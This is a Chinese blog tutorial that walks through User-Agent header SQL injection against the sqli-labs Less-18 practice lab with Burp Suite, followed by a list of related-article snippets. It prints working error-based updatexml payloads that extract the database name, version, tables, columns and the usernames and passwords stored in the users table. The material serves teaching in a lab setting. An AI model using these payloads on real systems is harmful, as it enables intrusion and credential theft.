SQL注入useragent注入

最新推荐文章于 2024-02-27 21:33:14 发布
最新推荐文章于 2024-02-27 21:33:14 发布
阅读量864 收藏 1
点赞数
分类专栏: WEB安全 WEB漏洞 WEB应用入侵-SQL注入的类型 文章标签: WEB漏洞 WEB安全 WEB应用入侵-SQL注入的类型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/studyphp123/article/details/89005788
版权

一、预备知识

二、实验目的

三、实验工具

浏览器、Burpsuite

四、实验环境

客户机一台

五、实验步骤

第一步:查看网页,显示的是访问者的 useragent 信息,所有可以通过 useragent 语句进行注入。

打开 http://www.any.com/sqli/Less-18/,手动设置代理为 127.0.0.1:8080

在这里插入图片描述

第二步:查看当前数据库名称,MySQL版本信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite 工具,刷新浏览器

在这里插入图片描述

3)抓包,将 useragent 添加 payload

123' or updatexml(1,concat(0x7e,database())),0) or '

在这里插入图片描述

4)得到当前的数据库名称:security

在这里插入图片描述

4)得到MySQL版本信息

123' or updatexml(1,concat(0x7e,(version())),0) or '

在这里插入图片描述

5)得到MySQL的版本信息。

在这里插入图片描述

第三步:查看当前数据库所有的表的信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security')),0) or '

在这里插入图片描述

4)得到所有的表:emailsreferersuagentsusers

在这里插入图片描述

第四步:查看 users 表的所有列信息。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),0) or '

在这里插入图片描述

4)得到所有列:idusernamepassword

在这里插入图片描述

第五步:查看 users 表的所有列的值。

1)登录;

Username 输入:admin
Password 输入:admin

2)打开 Burpsuite,刷新浏览器;

3)抓包,并将 useragent 添加 payload。

123' or updatexml(0,concat(0x7e,(select group_concat(id,username,password) from security.users)),0) or '

在这里插入图片描述

4)得到所有列的值:

在这里插入图片描述


注:如果出现 无法将SQL语句添加到 Burpsuite 中的情况,根据以下的方法解决

解决方法:点击 Burpsuite 中的 第二排的 options 中的其中三项打对勾,如下:

在这里插入图片描述

SQL注入之User-Agent注入
m0_48520508的博客
07-14 1103
0x00漏洞信息 披露者:harisec 危害程度:高危 漏洞类型sql注入 0x01漏洞介绍 通过访问: https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入 我没有从数据库中提取任何数据,我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操作相结合,将导致服务器响应不同的时间取决于算术运算的结果。 例如,将该值设置: Mozilla/5.0 (Windows NT 6.1; WOW64) App
sql注入--10http头注入
技术骨干小李的博客
07-27 678
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不
时下流行的浏览器User-Agent大全(9038条数据)分为sql版本和excel版本,2018-1-27更新
09-27
自己收集的User-Agent数据,分享给大家使用大概九万条数据,可以用来做采集伪造信息使用
SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 5238
1. 了解user-agent注入点; 2. 掌握user-agent注入的方法。
通过User-agent进行SQL注入
04-09 663
声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 文章来源:https://hackerone.com/reports/297478 我发现了一个SQL注入漏洞/dashboard/datagov/csv_to_json,可以通过User-AgentHTTP请求头利用它。 我没有从数据库中提取任何数据,我已经使用具有算术运算的sleepSQL查询确认了...
sql注入进阶/user-agent/基于报错的注入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 1316
基于user-agent 和报错的盲注
SQL注入
weixin_64655821的博客
10-23 964
SQL注入
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1381
简单的SQL注入
SQL注入篇--其他注入方式
qq_51003021的博客
08-12 675
SQL注入的其他种类注入方式
SQL注入之字符型注入练习(pikachu)
windStudyer的专栏
04-17 3857
SQL注入之字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符型注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法和注入类型,因为是字符..
HTTP中User-Agent注入
weixin_53519320的博客
10-28 1898
HTTP中User-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTP中User-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
SQL User-Agent注入详解
永远是少年
08-18 1459
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLUser-Agent注入详解。 一、SQL User-Agent简介 二、SQL User-Agent靶场简介 三、SQL User-Agent注入实战
sql注入之cookie 注入,user-agent注入
最新发布
没有故事
02-27 480
BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入
通过User-Agent进行SQL注入
richard1230的博客
10-30 647
通过User-Agent进行SQL注入声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
使用SQLmap进行UA注入(User-Agent注入
zyx_aplomb的博客
08-29 1136
使用sqlmap进行UA注入时的一些关键点
User Agent注入攻击及防御
weixin_33897722的博客
05-24 733
CloudFlare公司经常会收到客户询问为什么他们的一些请求会被CloudFlare WAF屏蔽。最近,一位客户就提出他不能理解为什么一个访问他主页简单的 GET 请求会被 WAF 屏蔽。 下面是被屏蔽的请求: GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,applicati...
User-Agent手工注入攻击及防御(探测与利用分析)
weixin_46709219的博客
12-19 2246
一)前情提要: 我的一个宿舍友提及,他不能理解为什么一个访问主页的简单的 GET 请求会被 WAF 屏蔽,他被屏蔽的HTTP请求如下: GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozi
SQL注入_1-6_user-agent注入
weixin_44110913的博客
12-08 1593
SQL注入_1-6_user-agent注入 一.概念 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示,但通过伪装 UA 可以绕过检测...
SQL-labs的第18关——http请求头注入(User-Agent)报错注入
qq_73393033的博客
07-21 539
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值